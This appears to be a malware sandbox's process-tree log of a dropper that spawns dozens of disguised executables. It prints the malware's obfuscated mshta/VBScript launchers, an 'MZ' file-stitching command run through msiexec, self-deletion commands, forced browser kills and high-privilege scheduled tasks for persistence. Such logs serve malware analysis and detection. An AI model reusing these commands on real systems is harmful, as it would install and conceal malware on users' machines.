C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"6⤵
- Checks whether UAC is enabled
-
-
C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e32⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e33⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e34⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e35⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e36⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e37⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e38⤵
- Checks whether UAC is enabled
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵
-
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "CGDdIXA0PUg531oqccqn7mSz.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp"C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp" /SL5="$503CC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"11⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exeC:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exeC:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe"C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe" -u14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x01bzai5.sl1\autosubplayer.exe /S & exit12⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe" -u9⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp" /SL5="$40466,506127,422400,C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"7⤵
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe" /VERYSILENT9⤵
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"9⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"9⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exeC:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654"11⤵
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635085627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe & exit10⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exeC:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe"C:\Users\Admin\AppData\Local\Temp\4unbyai3.qya\any.exe" -u12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\mh0ttsgr.5dn\gcleaner.exe /mixfive11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xtuo0mdo.yro\autosubplayer.exe /S & exit10⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"C:\Users\Admin\Pictures\Adobe Films\x9ASqAjzf_Bbkm30Jcu897HP.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x250,0x254,0x258,0x1b0,0x25c,0x7ffd8f5ddec0,0x7ffd8f5dded0,0x7ffd8f5ddee09⤵
-
